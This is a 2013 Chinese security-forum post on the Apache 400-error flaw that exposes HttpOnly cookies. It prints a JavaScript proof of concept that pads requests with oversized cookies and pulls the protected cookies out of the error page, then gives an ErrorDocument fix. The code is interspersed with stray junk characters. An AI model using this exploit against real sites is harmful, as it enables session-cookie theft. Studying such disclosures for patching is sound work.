中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]

---

作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题，一般都采用给cookie加上httponly的属性，来禁止直接使用js得到用户的cookie，从而降低xss的危害，而这个问题刚好可以用来绕过cookie的这个httponly的属性。
  x8 ~+ V/ \) `
0 I' v9 j; N" k用chrome打开一个站点，F12打开开发者工具，找到console输入如下代码并回车:
* @! q# A( {* n5 A8 A7 V

: m1 j5 Y" ?& k) p* B6 `5 {* A// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
// Construct string for cookie value
var str = "";
: ?% N; t" o8 w) |' W/ Bfor (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
9 c; n2 n8 Y1 ?* {& ~' s+ l8 ^7 P// Expire evil cookie
if (good) {
: _' n* P, t; m# v& W) Ovar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
  N- m0 q3 |! D, U}
! W5 d6 c  W) Y" L% m// Set evil cookie
8 R5 a' e0 R1 j# @, relse {
9 b7 C  s! u- v/ A4 T' {var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
9 }& H& p) O( b* W# Z5 o( I. O}
3 P$ n0 D, H0 ]; L) Bfunction makeRequest() {
setCookies();
0 s. P: ~% E% R1 l, U6 F8 z/ N9 {function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
0 x* P/ Z& q# Z2 |! ]! w: A2 \if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
( I# ?! h) F8 Q, m$ s3 M) vcontent = content[1].replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
$ u" i# D, L) a. ?( P8 P! |: H// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies.split('=',2);
. n% }# C5 V* E% [! s5 m9 f5 gcookie_dict[s_c[0]] = s_c[1];
: p$ x3 C+ c% m/ p& R+ w  v( H1 ~  ~}
& R( D( ^$ U, x; w}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
8 D6 d# m0 I( o: G' U8 {}
" G3 H: Q2 X/ A}
: @9 J1 C/ U  p5 x6 P// Make XHR request
var xhr = new XMLHttpRequest();
; E7 b9 y) S0 S! K% {xhr.onreadystatechange = parseCookies;
; E% |, z9 w+ ~) e0 V% c+ Z9 Z5 uxhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest();
3 L8 o* ?/ R/ P
/ i' O( y6 @1 H% I& U你就能看见华丽丽的400错误包含着cookie信息。

下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

修复方案：

1 P% W- b; C. |' PApache官方提供4种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下

In the event of a problem or error, Apachecan be configured to do one of four things,

' k+ o# U* R/ L. a$ Z1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
  W, X2 w  m2 N% y* C( A& z" l- u2. output acustomized message输出一段信息
) D- q( m  v: T' r2 q3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
4. redirect to an external URL to handle theproblem/error转向一个外部URL

% u% F# w* \- ?7 A经测试，对于400错误只有方法2有效，返回包不会再包含cookie内容
; w1 I# h0 O, V! L
Apache配置：

: o* j% k- z. d; fErrorDocument400 " security test"

7 G3 s. J  B9 K- Z2 V9 H当然，升级apache到最新也可：）。

2 I2 T" f) a7 ]8 O参考：http://httpd.apache.org/security/vulnerabilities_22.html

/ T0 S! t! v2 l2 c. V: S

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2